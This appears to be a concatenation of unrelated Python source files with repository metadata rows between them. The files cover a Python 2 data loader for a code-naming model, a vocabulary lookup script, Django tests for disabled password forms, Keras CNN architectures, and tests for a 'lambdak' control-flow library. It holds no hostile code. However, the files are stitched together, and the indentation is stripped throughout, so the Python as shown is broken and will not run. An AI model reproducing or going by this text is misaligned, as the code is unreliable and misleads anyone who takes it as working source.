def get_data_in_forward_format_with_validation(input_file, names_cx_size, pct_train):
assert pct_train < 1
assert pct_train > 0
names, code, original_names = TokenCodeNamingData.__get_file_data(input_file)
names = np.array(names, dtype=np.object)
code = np.array(code, dtype=np.object)
original_names = np.array(original_names, dtype=np.object)
lim = int(pct_train * len(names))
naming = TokenCodeNamingData(names[:lim], code[:lim])
return naming.__get_data_in_forward_format(names[:lim], code[:lim], names_cx_size),\
naming.__get_data_in_forward_format(names[lim:], code[lim:], names_cx_size), naming
def get_data_in_forward_format(self, input_file, name_cx_size):
names, code, original_names = self.__get_file_data(input_file)
return self.__get_data_in_forward_format(names, code, name_cx_size), original_names
def __get_data_in_forward_format(self, names, code, name_cx_size):
"""
Get the data in a "forward" model format.
:param data:
:param name_cx_size:
:return:
"""
assert len(names) == len(code), (len(names), len(code), code.shape)
# Keep only identifiers in code
#code = self.keep_identifiers_only(code)
name_targets = []
name_contexts = []
original_names_ids = []
id_xs = []
id_ys = []
k = 0
for i, name in enumerate(names):
for j in xrange(1, len(name)): # First element should always be predictable (ie sentence start)
name_targets.append(self.name_dictionary.get_id_or_unk(name[j]))
original_names_ids.append(i)
context = name[:j]
if len(context) < name_cx_size:
context = [self.NONE] * (name_cx_size - len(context)) + context
else:
context = context[-name_cx_size:]
assert len(context) == name_cx_size, (len(context), name_cx_size,)
name_contexts.append([self.name_dictionary.get_id_or_unk(t) for t in context])
for code_token in set(code[i]):
token_id = self.all_tokens_dictionary.get_id_or_none(code_token)
if token_id is not None:
id_xs.append(k)
id_ys.append(token_id)
k += 1
code_features = sp.csr_matrix((np.ones(len(id_xs)), (id_xs, id_ys)), shape=(k, len(self.all_tokens_dictionary)), dtype=np.int32)
name_targets = np.array(name_targets, dtype=np.int32)
name_contexts = np.array(name_contexts, dtype=np.int32)
original_names_ids = np.array(original_names_ids, dtype=np.int32)
return name_targets, name_contexts, code_features, original_names_ids
@staticmethod
def keep_identifiers_only(self, code):
filtered_code = []
for tokens in code:
identifier_tokens = []
in_id = False
for t in tokens:
if t == "<id>":
in_id = True
elif t == '</id>':
in_id = False
elif in_id:
identifier_tokens.append(t)
filtered_code.append(identifier_tokens)
return filtered_code
@staticmethod
def remove_identifiers_markers(code):
return filter(lambda t: t != "<id>" and t != "</id>", code)
def get_data_in_convolution_format(self, input_file, name_cx_size, min_code_size):
names, code, original_names = self.__get_file_data(input_file)
return self.get_data_for_convolution(names, code, name_cx_size, min_code_size), original_names
def get_data_in_copy_convolution_format(self, input_file, name_cx_size, min_code_size):
names, code, original_names = self.__get_file_data(input_file)
return self.get_data_for_copy_convolution(names, code, name_cx_size, min_code_size), original_names
def get_data_in_recurrent_convolution_format(self, input_file, min_code_size):
names, code, original_names = self.__get_file_data(input_file)
return self.get_data_for_recurrent_convolution(names, code, min_code_size), original_names
def get_data_in_recurrent_copy_convolution_format(self, input_file, min_code_size):
names, code, original_names = self.__get_file_data(input_file)
return self.get_data_for_recurrent_copy_convolution(names, code, min_code_size), original_names
def get_data_for_convolution(self, names, code, name_cx_size, sentence_padding):
assert len(names) == len(code), (len(names), len(code), code.shape)
name_targets = []
name_contexts = []
original_names_ids = []
code_sentences = []
padding = [self.all_tokens_dictionary.get_id_or_unk(self.NONE)]
for i, name in enumerate(names):
code_sentence = [self.all_tokens_dictionary.get_id_or_unk(t) for t in code[i]]
if sentence_padding % 2 == 0:
code_sentence = padding * (sentence_padding / 2) + code_sentence + padding * (sentence_padding / 2)
else:
code_sentence = padding * (sentence_padding / 2 + 1) + code_sentence + padding * (sentence_padding / 2)
for j in xrange(1, len(name)): # First element should always be predictable (ie sentence start)
name_targets.append(self.all_tokens_dictionary.get_id_or_unk(name[j]))
original_names_ids.append(i)
context = name[:j]
if len(context) < name_cx_size:
context = [self.NONE] * (name_cx_size - len(context)) + context
else:
context = context[-name_cx_size:]
assert len(context) == name_cx_size, (len(context), name_cx_size,)
name_contexts.append([self.name_dictionary.get_id_or_unk(t) for t in context])
code_sentences.append(np.array(code_sentence, dtype=np.int32))
name_targets = np.array(name_targets, dtype=np.int32)
name_contexts = np.array(name_contexts, dtype=np.int32)
code_sentences = np.array(code_sentences, dtype=np.object)
original_names_ids = np.array(original_names_ids, dtype=np.int32)
return name_targets, name_contexts, code_sentences, original_names_ids
def get_data_for_recurrent_convolution(self, names, code, sentence_padding):
assert len(names) == len(code), (len(names), len(code), code.shape)
name_targets = []
code_sentences = []
padding = [self.all_tokens_dictionary.get_id_or_unk(self.NONE)]
for i, name in enumerate(names):
code_sentence = [self.all_tokens_dictionary.get_id_or_unk(t) for t in code[i]]
if sentence_padding % 2 == 0:
code_sentence = padding * (sentence_padding / 2) + code_sentence + padding * (sentence_padding / 2)
else:
code_sentence = padding * (sentence_padding / 2 + 1) + code_sentence + padding * (sentence_padding / 2)
name_tokens = [self.all_tokens_dictionary.get_id_or_unk(t) for t in name]
name_targets.append(np.array(name_tokens, dtype=np.int32))
code_sentences.append(np.array(code_sentence, dtype=np.int32))
name_targets = np.array(name_targets, dtype=np.object)
code_sentences = np.array(code_sentences, dtype=np.object)
return name_targets, code_sentences
def get_data_for_recurrent_copy_convolution(self, names, code, sentence_padding):
assert len(names) == len(code), (len(names), len(code), code.shape)
name_targets = []
target_is_unk = []
copy_vectors = []
code_sentences = []
padding = [self.all_tokens_dictionary.get_id_or_unk(self.NONE)]
for i, name in enumerate(names):
code_sentence = [self.all_tokens_dictionary.get_id_or_unk(t) for t in code[i]]
if sentence_padding % 2 == 0:
code_sentence = padding * (sentence_padding / 2) + code_sentence + padding * (sentence_padding / 2)
else:
code_sentence = padding * (sentence_padding / 2 + 1) + code_sentence + padding * (sentence_padding / 2)
name_tokens = [self.all_tokens_dictionary.get_id_or_unk(t) for t in name]
unk_tokens = [self.all_tokens_dictionary.is_unk(t) for t in name]
target_can_be_copied = [[t == subtok for t in code[i]] for subtok in name]
name_targets.append(np.array(name_tokens, dtype=np.int32))
target_is_unk.append(np.array(unk_tokens, dtype=np.int32))
copy_vectors.append(np.array(target_can_be_copied, dtype=np.int32))
code_sentences.append(np.array(code_sentence, dtype=np.int32))
name_targets = np.array(name_targets, dtype=np.object)
code_sentences = np.array(code_sentences, dtype=np.object)
code = np.array(code, dtype=np.object)
target_is_unk = np.array(target_is_unk, dtype=np.object)
copy_vectors = np.array(copy_vectors, dtype=np.object)
return name_targets, code_sentences, code, target_is_unk, copy_vectors
@staticmethod
def get_data_in_recurrent_convolution_format_with_validation(input_file, pct_train, min_code_size):
assert pct_train < 1
assert pct_train > 0
names, code, original_names = TokenCodeNamingData.__get_file_data(input_file)
names = np.array(names, dtype=np.object)
code = np.array(code, dtype=np.object)
lim = int(pct_train * len(names))
idxs = np.arange(len(names))
np.random.shuffle(idxs)
naming = TokenCodeNamingData(names[idxs[:lim]], code[idxs[:lim]])
return naming.get_data_for_recurrent_convolution(names[idxs[:lim]], code[idxs[:lim]], min_code_size),\
naming.get_data_for_recurrent_convolution(names[idxs[lim:]], code[idxs[lim:]], min_code_size), naming
@staticmethod
def get_data_in_recurrent_copy_convolution_format_with_validation(input_file, pct_train, min_code_size):
assert pct_train < 1
assert pct_train > 0
names, code, original_names = TokenCodeNamingData.__get_file_data(input_file)
names = np.array(names, dtype=np.object)
code = np.array(code, dtype=np.object)
lim = int(pct_train * len(names))
idxs = np.arange(len(names))
np.random.shuffle(idxs)
naming = TokenCodeNamingData(names[idxs[:lim]], code[idxs[:lim]])
return naming.get_data_for_recurrent_copy_convolution(names[idxs[:lim]], code[idxs[:lim]], min_code_size),\
naming.get_data_for_recurrent_copy_convolution(names[idxs[lim:]], code[idxs[lim:]], min_code_size), naming
@staticmethod
def get_data_in_convolution_format_with_validation(input_file, names_cx_size, pct_train, min_code_size):
assert pct_train < 1
assert pct_train > 0
names, code, original_names = TokenCodeNamingData.__get_file_data(input_file)
names = np.array(names, dtype=np.object)
code = np.array(code, dtype=np.object)
lim = int(pct_train * len(names))
idxs = np.arange(len(names))
np.random.shuffle(idxs)
naming = TokenCodeNamingData(names[idxs[:lim]], code[idxs[:lim]])
return naming.get_data_for_convolution(names[idxs[:lim]], code[idxs[:lim]], names_cx_size, min_code_size),\
naming.get_data_for_convolution(names[idxs[lim:]], code[idxs[lim:]], names_cx_size, min_code_size), naming
@staticmethod
def get_data_in_copy_convolution_format_with_validation(input_file, names_cx_size, pct_train, min_code_size):
assert pct_train < 1
assert pct_train > 0
names, code, original_names = TokenCodeNamingData.__get_file_data(input_file)
names = np.array(names, dtype=np.object)
code = np.array(code, dtype=np.object)
lim = int(pct_train * len(names))
idxs = np.arange(len(names))
np.random.shuffle(idxs)
naming = TokenCodeNamingData(names[idxs[:lim]], code[idxs[:lim]])
return naming.get_data_for_copy_convolution(names[idxs[:lim]], code[idxs[:lim]], names_cx_size, min_code_size),\
naming.get_data_for_copy_convolution(names[idxs[lim:]], code[idxs[lim:]], names_cx_size, min_code_size), naming
def get_data_for_copy_convolution(self, names, code, name_cx_size, sentence_padding):
assert len(names) == len(code), (len(names), len(code), code.shape)
name_targets = []
original_targets = []
name_contexts = []
original_names_ids = []
code_sentences = []
original_code = []
copy_vector = []
target_is_unk = []
padding = [self.all_tokens_dictionary.get_id_or_unk(self.NONE)]
for i, name in enumerate(names):
code_sentence = [self.all_tokens_dictionary.get_id_or_unk(t) for t in code[i]]
if sentence_padding % 2 == 0:
code_sentence = padding * (sentence_padding / 2) + code_sentence + padding * (sentence_padding / 2)
else:
code_sentence = padding * (sentence_padding / 2 + 1) + code_sentence + padding * (sentence_padding / 2)
for j in xrange(1, len(name)): # First element should always be predictable (ie sentence start)
name_targets.append(self.all_tokens_dictionary.get_id_or_unk(name[j]))
original_targets.append(name[j])
target_is_unk.append(self.all_tokens_dictionary.is_unk(name[j]))
original_names_ids.append(i)
context = name[:j]
if len(context) < name_cx_size:
context = [self.NONE] * (name_cx_size - len(context)) + context
else:
context = context[-name_cx_size:]
assert len(context) == name_cx_size, (len(context), name_cx_size,)
name_contexts.append([self.name_dictionary.get_id_or_unk(t) for t in context])
code_sentences.append(np.array(code_sentence, dtype=np.int32))
original_code.append(code[i])
tokens_to_be_copied = [t == name[j] for t in code[i]]
copy_vector.append(np.array(tokens_to_be_copied, dtype=np.int32))
name_targets = np.array(name_targets, dtype=np.int32)
name_contexts = np.array(name_contexts, dtype=np.int32)
code_sentences = np.array(code_sentences, dtype=np.object)
original_names_ids = np.array(original_names_ids, dtype=np.int32)
copy_vector = np.array(copy_vector, dtype=np.object)
target_is_unk = np.array(target_is_unk, dtype=np.int32)
return name_targets, original_targets, name_contexts, code_sentences, original_code, copy_vector, target_is_unk, original_names_ids
def get_suggestions_given_name_prefix(self, next_name_log_probs, name_cx_size, max_predicted_identifier_size=5, max_steps=100):
suggestions = defaultdict(lambda: float('-inf')) # A list of tuple of full suggestions (token, prob)
# A stack of partial suggestion in the form ([subword1, subword2, ...], logprob)
possible_suggestions_stack = [
([self.NONE] * (name_cx_size - 1) + [self.SUBTOKEN_START], [], 0)]
# Keep the max_size_to_keep suggestion scores (sorted in the heap). Prune further exploration if something has already
# lower score
predictions_probs_heap = [float('-inf')]
max_size_to_keep = 15
nsteps = 0
while True:
scored_list = []
while len(possible_suggestions_stack) > 0:
subword_tokens = possible_suggestions_stack.pop()
# If we're done, append to full suggestions
if subword_tokens[0][-1] == self.SUBTOKEN_END:
final_prediction = tuple(subword_tokens[1][:-1])
if len(final_prediction) == 0:
continue
log_prob_of_suggestion = np.logaddexp(suggestions[final_prediction], subword_tokens[2])
if log_prob_of_suggestion > predictions_probs_heap[0] and not log_prob_of_suggestion == float('-inf'):
# Push only if the score is better than the current minimum and > 0 and remove extraneous entries
suggestions[final_prediction] = log_prob_of_suggestion
heapq.heappush(predictions_probs_heap, log_prob_of_suggestion)
if len(predictions_probs_heap) > max_size_to_keep:
heapq.heappop(predictions_probs_heap)
continue
elif len(subword_tokens[1]) > max_predicted_identifier_size: # Stop recursion here
continue
# Convert subword context
context = [self.name_dictionary.get_id_or_unk(k) for k in
subword_tokens[0][-name_cx_size:]]
assert len(context) == name_cx_size
context = np.array([context], dtype=np.int32)
# Predict next subwords
target_subword_logprobs = next_name_log_probs(context)
def get_possible_options(name_id):
# TODO: Handle UNK differently?
subword_name = self.all_tokens_dictionary.get_name_for_id(name_id)
if subword_name == self.all_tokens_dictionary.get_unk():
subword_name = "***"
name = subword_tokens[1] + [subword_name]
return subword_tokens[0][1:] + [subword_name], name, target_subword_logprobs[0, name_id] + \
subword_tokens[2]
top_indices = np.argsort(-target_subword_logprobs[0])
possible_options = [get_possible_options(top_indices[i]) for i in xrange(max_size_to_keep)]
# Disallow suggestions that contain duplicated subtokens.
scored_list.extend(filter(lambda x: len(x[1])==1 or x[1][-1] != x[1][-2], possible_options))
# Prune
scored_list = filter(lambda suggestion: suggestion[2] >= predictions_probs_heap[0] and suggestion[2] >= float('-inf'), scored_list)
scored_list.sort(key=lambda entry: entry[2], reverse=True)
# Update
possible_suggestions_stack = scored_list[:max_size_to_keep]
nsteps += 1
if nsteps >= max_steps:
break
# Sort and append to predictions
suggestions = [(identifier, np.exp(logprob)) for identifier, logprob in suggestions.items()]
suggestions.sort(key=lambda entry: entry[1], reverse=True)
# print suggestions
return suggestions
| 51.953744 | 143 | 0.644338 | 23,399 | 0.99203 | 0 | 0 | 7,055 | 0.299105 | 0 | 0 | 1,684 | 0.071395 |
a82c44a1683f511d5f99fbda3a6f12bd84f86c4c | 550 | py | Python | test_word.py | AsherSeiling/Ap-hug-Vocab-database | fbf29a225e81a5807b6ff4e06fbb24e88ce55a6a | [
"MIT"
]
| null | null | null | test_word.py | AsherSeiling/Ap-hug-Vocab-database | fbf29a225e81a5807b6ff4e06fbb24e88ce55a6a | [
"MIT"
]
| 1 | 2021-02-27T06:12:07.000Z | 2021-03-01T14:32:39.000Z | test_word.py | AsherSeiling/Ap-hug-Vocab-database | fbf29a225e81a5807b6ff4e06fbb24e88ce55a6a | [
"MIT"
]
| 1 | 2021-02-27T06:14:55.000Z | 2021-02-27T06:14:55.000Z | words = open("words.txt", "r")
words = [x.rstrip("\n") for x in words.readlines()]
refwords = open("referencewords.txt", "r")
refwords = [x.strip("\n") for x in refwords.readlines()]
def find_word(word):
retunrval = False
if word.lower() in words:
retunrval = True
return retunrval
words_needed = []
def main():
for items in refwords:
buffer = ""
for i in items:
if i != " ":
buffer += i
testword = find_word(buffer.lower())
if testword == False:
words_needed.append(items.lower())
main()
for i in words_needed:
print(i) | 20.37037 | 56 | 0.650909 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 50 | 0.090909 |
a82e508670c379c3dbb7d2f2e849d1ec9ed6d7a8 | 2,736 | py | Python | democrasite/users/tests/test_forms.py | mfosterw/cookiestocracy | 6912e9e7c3006024d0fbee61dce5c48e63e9e231 | [
"MIT"
]
| null | null | null | democrasite/users/tests/test_forms.py | mfosterw/cookiestocracy | 6912e9e7c3006024d0fbee61dce5c48e63e9e231 | [
"MIT"
]
| 9 | 2021-07-18T17:16:42.000Z | 2022-03-31T00:19:14.000Z | democrasite/users/tests/test_forms.py | mfosterw/cookiestocracy | 6912e9e7c3006024d0fbee61dce5c48e63e9e231 | [
"MIT"
]
| null | null | null | # pylint: disable=too-few-public-methods,no-self-use
from django.utils.crypto import get_random_string
from django.utils.translation import gettext_lazy as _
from democrasite.users.forms import (
DisabledChangePasswordForm,
DisabledResetPasswordForm,
DisabledResetPasswordKeyForm,
DisabledSetPasswordForm,
UserCreationForm,
)
from democrasite.users.models import User
class TestUserCreationForm:
"""
Test class for all tests related to the UserCreationForm
"""
def test_username_validation_error_msg(self, user: User):
"""
Tests UserCreation Form's unique validator functions correctly by testing:
1) A new user with an existing username cannot be added.
2) Only 1 error is raised by the UserCreation Form
3) The desired error message is raised
"""
# The user already exists,
# hence cannot be created.
form = UserCreationForm(
{
"username": user.username,
"password1": user.password,
"password2": user.password,
}
)
assert not form.is_valid()
assert len(form.errors) == 1
assert "username" in form.errors
assert form.errors["username"][0] == _("This username has already been taken.")
class TestDisabledForms:
def test_change_password_form(self, user: User):
password = get_random_string(20)
form = DisabledChangePasswordForm(
data={
"oldpassword": user.password,
"password1": password,
"password2": password,
},
user=user,
)
assert not form.is_valid()
assert form.errors["__all__"][0] == _("You cannot change your password.")
def test_set_password_form(self, user: User):
password = get_random_string(20)
form = DisabledSetPasswordForm(
data={"password1": password, "password2": password},
user=user,
)
assert not form.is_valid()
assert form.errors["__all__"][0] == _("You cannot set a password.")
def test_reset_password_form(self, user: User):
form = DisabledResetPasswordForm(data={"email": user.email})
assert not form.is_valid()
assert form.errors["__all__"][0] == _("You cannot reset your password.")
def test_reset_key_password_form(self, user: User):
password = get_random_string(20)
form = DisabledResetPasswordKeyForm(
data={"password1": password, "password2": password},
user=user,
)
assert not form.is_valid()
assert form.errors["__all__"][0] == _("You cannot reset your password.")
| 32.571429 | 87 | 0.623904 | 2,341 | 0.855629 | 0 | 0 | 0 | 0 | 0 | 0 | 798 | 0.291667 |
a82ef552d3bf70dc77e897c13a1b0f9b584ffa9d | 3,359 | py | Python | src/keras_networks.py | RU-IIPL/2DLD_keras | 8c291b6a652f54bd94cb3a5c8382d10ba42e5cbf | [
"MIT"
]
| 1 | 2021-05-24T08:00:29.000Z | 2021-05-24T08:00:29.000Z | src/keras_networks.py | RU-IIPL/2DLD_keras | 8c291b6a652f54bd94cb3a5c8382d10ba42e5cbf | [
"MIT"
]
| null | null | null | src/keras_networks.py | RU-IIPL/2DLD_keras | 8c291b6a652f54bd94cb3a5c8382d10ba42e5cbf | [
"MIT"
]
| 1 | 2021-09-29T03:43:46.000Z | 2021-09-29T03:43:46.000Z | # -*- coding: utf-8 -*-
"""
@author: Terada
"""
from keras.models import Sequential, Model
from keras.layers import Dense, MaxPooling2D, Flatten, Dropout
from keras.layers import Conv2D, BatchNormalization, ZeroPadding2D, MaxPool2D
from keras.layers import Input, Convolution2D, AveragePooling2D, merge, Reshape, Activation, concatenate
from keras.regularizers import l2
#from keras.engine.topology import Container
def net7(input_size):
model = Sequential()
model.add(Conv2D(32, (3, 3), activation='relu', input_shape=(input_size[0], input_size[1], 1)))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(32, (3, 3), activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(64, (3, 3), activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(64, (3, 3), activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Flatten())
model.add(Dense(1000, activation='relu'))
model.add(Dense(500, activation='relu'))
model.add(Dense(28))
return model
def lenet(input_size):
model = Sequential()
model.add(Conv2D(20, kernel_size=5, strides=1, activation='relu', input_shape=(input_size[0], input_size[1], 1)))
model.add(MaxPooling2D(2, strides=2))
model.add(Conv2D(50, kernel_size=5, strides=1, activation='relu'))
model.add(MaxPooling2D(2, strides=2))
model.add(Flatten())
model.add(Dense(500, activation='relu'))
model.add(Dense(28)) #activation='softmax'
return model
def alexnet(input_size):
model = Sequential()
model.add(Conv2D(48, 11, strides=3, activation='relu', padding='same', input_shape=(input_size[0], input_size[1], 1)))
model.add(MaxPooling2D(3, strides=2))
model.add(BatchNormalization())
model.add(Conv2D(128, 5, strides=3, activation='relu', padding='same'))
model.add(MaxPooling2D(3, strides=2))
model.add(BatchNormalization())
model.add(Conv2D(192, 3, strides=1, activation='relu', padding='same'))
model.add(Conv2D(192, 3, strides=1, activation='relu', padding='same'))
model.add(Conv2D(128, 3, strides=1, activation='relu', padding='same'))
model.add(MaxPooling2D(3, strides=2))
model.add(BatchNormalization())
model.add(Flatten())
model.add(Dense(2048, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(2048, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(28)) #activation='softmax'
return model
def malti_net(input_size):
inputs = Input(shape=(input_size[0], input_size[1], 1))
conv1 = Conv2D(18, (3, 3), activation='relu')(inputs)
pool1 = MaxPooling2D(pool_size=(2, 2))(conv1)
conv2 = Conv2D(32, (3, 3), activation='relu')(pool1)
pool2 = MaxPooling2D(pool_size=(2, 2))(conv2)
conv3 = Conv2D(32, (3, 3), activation='relu')(pool2)
pool3 = MaxPooling2D(pool_size=(2, 2))(conv3)
conv4 = Conv2D(64, (3, 3), activation='relu')(pool3)
pool4 = MaxPooling2D(pool_size=(2, 2))(conv4)
flat1 = Flatten()(pool4)
fc1 = Dense(1000, activation='relu')(flat1)
fc2 = Dense(500, activation='relu')(fc1)
x_main = Dense(28, name='main')(fc2)
x_sub1 = Dense(2, name='sub1', activation='softmax')(fc2)
x_sub2 = Dense(5, name='sub2', activation='softmax')(fc2)
model = Model(inputs=inputs, outputs=[x_main, x_sub1, x_sub2])
return model
| 42.518987 | 122 | 0.677583 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 330 | 0.098244 |
a82fdc3cbf4660f5463187cd042910a00705a302 | 9,951 | py | Python | lambdak_spec.py | yawaramin/lambdak | 5038531f2939dfbbbf94ea859454efaf69bf6487 | [
"MIT"
]
| 19 | 2015-01-13T23:36:23.000Z | 2021-05-29T16:05:05.000Z | lambdak_spec.py | yawaramin/lambdak | 5038531f2939dfbbbf94ea859454efaf69bf6487 | [
"MIT"
]
| 1 | 2015-11-09T17:23:05.000Z | 2015-11-09T18:48:26.000Z | lambdak_spec.py | yawaramin/lambdak | 5038531f2939dfbbbf94ea859454efaf69bf6487 | [
"MIT"
]
| 3 | 2016-03-26T15:57:36.000Z | 2018-11-30T07:04:03.000Z | from contextlib import closing, contextmanager
import StringIO as s
import unittest as t
from lambdak import *
# A helper class to test attribute access.
class A: pass
# Helper functions for the tests.
def inc(x): return x + 1
def double(x): return x * 2
class test_lambdak(t.TestCase):
def test_init_k_x(self):
args = (1, 2)
lk = lambdak(*args)
self.assertEqual((lk.k, lk.x), (1, (2,)))
def test_init_k(self):
val = 1
lk = lambdak(val)
self.assertEqual((lk.k, lk.x), (val, ()))
class test_call_(t.TestCase):
def test_call_none(self):
self.assertEqual(call_(None), None)
def test_call_func(self):
val = 1
def f(): return val
self.assertEqual(call_(f), val)
class test_do_(t.TestCase):
def setUp(self):
self.a = A()
self.name = "x"
self.val = 1
def test_do_not(self):
"The do_ action shouldn't be carried out unless the lambdak is called."
self.a.x = 2
d = do_(lambda: setattr(self.a, self.name, self.val))
self.assertNotEqual(self.a.x, self.val)
def test_do_1(self):
do_(lambda: setattr(self.a, self.name, self.val))()
self.assertEqual(self.a.x, self.val)
def test_do_2(self):
val2 = 2
do_(lambda: setattr(self.a, self.name, self.val), lambda:
do_(lambda: setattr(self.a, "y", val2)))()
self.assertEqual((self.a.x, self.a.y), (self.val, val2))
class test_given_(t.TestCase):
def test_given_id(self):
val = 1
f = given_(return_)
self.assertEqual(f(val), val)
def test_given_recursion(self):
"Test that tail recursion doesn't stack overflow if it uses lambdak's trampoline system."
factorial = given_(lambda n, acc = 1:
acc if n <= 1
else given_(lambda: factorial.k(n - 1, n * acc)))
try: factorial(1000, 1)
except: self.assertTrue(False)
finally: self.assertTrue(True)
class test_assert_(t.TestCase):
def test_assert_succeed(self):
try:
assert_(True)()
self.assertTrue(True)
except:
self.assertTrue(False)
def test_assert_fail(self):
self.assertRaises(AssertionError, assert_(False))
class test_raise_(t.TestCase):
def setUp(self): self.exn = Exception
def test_raise_last(self):
try: raise self.exn
except: self.assertRaises(self.exn, raise_())
def test_raise_exn_type(self):
self.assertRaises(self.exn, raise_(self.exn))
def test_raise_exn_val(self):
e = Exception("Bad")
self.assertRaises(self.exn, raise_(e))
def test_raise_exn_type_val(self):
msg = "Bad"
e = Exception(msg)
try: raise_(Exception, e)()
except Exception, ee:
self.assertEqual(ee.message, msg)
return
self.assertTrue(False)
class test_cond_(t.TestCase):
def test_cond_val(self):
val = 1
cond_val = cond_(
[ (lambda: True, lambda: val),
(lambda: False, lambda: 2) ],
None)
self.assertEqual(cond_val(), val)
def test_cond_noval(self):
cond_noval = cond_(
[ (lambda: False, lambda: 1) ],
None)
self.assertEqual(cond_noval(), None)
def test_cond_return_effect(self):
"An effect wrapped in a lambdak should be returned from cond_."
a = A()
a.x = 1
attr_name = "x"
val = 2
cond_(
[ (lambda: False, lambda: setattr_(a, attr_name, 0)),
(lambda: True, lambda: setattr_(a, attr_name, val)) ],
None,
return_)()
self.assertEqual(a.x, val)
class test_import_(t.TestCase):
def test_import_math(self):
"Math here is representative of the Python standard library."
pi_floor = import_("math", lambda _: _.floor(_.pi))
self.assertEqual(pi_floor(), 3)
class test_try_(t.TestCase):
def setUp(self): self.a = A()
def test_try_exn(self):
val = 1
try_(lambda: 1 / 0, lambda: setattr(self.a, "x", val))()
self.assertEqual(self.a.x, val)
def test_try_noexn(self):
val = 1
self.a.x = val
try_(lambda: 1, lambda: setattr(self.a, "x", 2))()
self.assertEqual(self.a.x, val)
def test_try_exn_else_finally(self):
"The else_ action should not run if there's an exception."
self.a.x = 1
ex_val = 2
noex_val = 3
try_(lambda: 1 / 0,
except_ = lambda: setattr(self.a, "x", ex_val),
else_ = lambda: setattr(self.a, "x", noex_val),
finally_ =
const_(modattr_(self.a, "x", double)))()
self.assertEqual(self.a.x, double(ex_val))
def test_try_noexn_else_finally(self):
"The else_ action should run if there's no exception."
self.a.x = 1
ex_val = 2
noex_val = 3
try_(lambda: 1,
except_ = lambda: setattr(self.a, "x", ex_val),
else_ = lambda: setattr(self.a, "x", noex_val),
finally_ =
const_(modattr_(self.a, "x", double)))()
self.assertEqual(self.a.x, double(noex_val))
def test_try_exn_retval(self):
"The try_ lambdak should be able to 'return' a result value."
x = try_(
lambda: 1 / 0,
except_ = lambda: 0,
finally_ = return_)()
self.assertEqual(x, 0)
def test_python_try_finally_always(self):
"Python's built-in try statement finally clause should run even if exception occurs and is not caught."
start_val = 0
final_val = 2
try:
try: 1 / 0
except AttributeError: start_val += 1
finally: start_val += 2
except: pass
self.assertEqual(start_val, final_val)
class test_for_(t.TestCase):
def setUp(self):
self.a = A()
def test_for_act(self):
vals = (1, 2, 3)
for_(range(1, 4), lambda _: setattr(self.a, "x%s" % _, _))()
self.assertEqual((self.a.x1, self.a.x2, self.a.x3), vals)
def test_for_break(self):
break_val = 3
for_(range(1, 5), lambda i:
break_ if i == break_val
else setattr(self.a, "x", i))()
self.assertEqual(self.a.x, break_val - 1)
def test_for_continue(self):
skip_val = 3
xs = []
for_(range(1, 5), lambda i:
continue_ if i == skip_val
else xs.append(i))()
self.assertFalse(skip_val in xs)
def test_for_else_break(self):
"The else_ parameter should not run if we break out of the loop."
val = 0
d = { "x": val }
for_else_(range(5), lambda i: break_,
else_ = lambda: mod_("x", inc, d))()
self.assertEqual(d["x"], val)
def test_for_else_nobreak(self):
"The else_ parameter should run if we don't break out of the loop."
val = 0
d = { "x": val }
for_else_(range(5), lambda i: None,
else_ = lambda: mod_("x", inc, d))()
self.assertEqual(d["x"], val + 1)
class test_while_(t.TestCase):
def setUp(self):
self.a = A()
self.a.x = 0
def test_while_expr(self):
val = 10
while_(lambda: self.a.x < val, lambda:
modattr_(self.a, "x", inc))()
self.assertEqual(self.a.x, val)
def test_while_break(self):
break_val = 5
while_(lambda: True, lambda:
break_ if self.a.x == break_val
else modattr_(self.a, "x", inc))()
self.assertEqual(self.a.x, break_val)
def test_while_continue(self):
"Should immediately skip to the next iteration of the loop if an object of type `continue_` is returned from any of the lambdaks inside the `while_` lambdak."
xs = []
skip_val = 2
while_(lambda: self.a.x <= 4, lambda:
modattr_(self.a, "x", inc, lambda:
continue_ if self.a.x == skip_val
else xs.append(self.a.x)))()
self.assertFalse(skip_val in xs)
def test_while_else_break(self):
"Should not run the else_ clause if we break out of the loop."
d = { "x": 0 }
break_val = 2
mult = 2
while_else_(lambda: d["x"] <= 4, lambda:
break_ if d["x"] == break_val
else mod_("x", inc, d),
else_ = lambda: mod_("x", double, d))()
self.assertEqual(d["x"], break_val)
def test_while_else_nobreak(self):
"Should run the else_ clause if we don't break out of the loop."
d = { "x": 0 }
loop_end = 4
while_else_(lambda: d["x"] < loop_end, lambda: mod_("x", inc, d),
else_ = lambda: mod_("x", double, d))()
self.assertEqual(d["x"], double(loop_end))
class test_attr_accessors(t.TestCase):
def setUp(self):
self.a = A()
self.attr_name = "x"
def test_setattr_(self):
val = 1
setattr_(self.a, self.attr_name, val)()
self.assertEqual(self.a.x, val)
def test_delattr_(self):
self.a.x = 1
delattr_(self.a, self.attr_name)()
self.assertFalse(hasattr(self.a, self.attr_name))
def test_modattr_(self):
self.a.x = 1
modattr_(self.a, self.attr_name, inc)()
self.assertEqual(self.a.x, 2)
class test_with_(t.TestCase):
def setUp(self):
self.a = A()
self.a.x = 0
def incr():
self.a.x += 1
yield
self.a.x += 1
self.incr = contextmanager(incr)
self.with_lk = with_(self.incr, lambda: None)
def test_with_ctx_before(self): self.assertEqual(self.a.x, 0)
def test_with_ctx_after(self):
self.with_lk()
self.assertEqual(self.a.x, 2)
def test_with_get_nothing(self):
"If the context manager doesn't bind a value, the handler function shouldn't get an argument."
try: with_(self.incr, lambda: None)()
except:
self.assertTrue(False)
return
self.assertTrue(True)
def test_with_get_val(self):
"If the context manager binds a value, the handler function should get the value as an argument."
try: with_(lambda: closing(s.StringIO()), lambda _: None)()
except:
self.assertTrue(False)
return
self.assertTrue(True)
class test_dict_accessors(t.TestCase):
def setUp(self):
self.k, self.v = "x", 1
self.d = { self.k: self.v }
def test_assign_(self):
val = 2
assign_(self.k, val, self.d)()
self.assertEqual(self.d[self.k], val)
def test_get_(self): self.assertEqual(get_(self.k, self.d), self.v)
def test_del_(self):
del_(self.k, self.d)()
self.assertTrue(self.k not in self.d)
def test_mod_(self):
mod_(self.k, inc, self.d)()
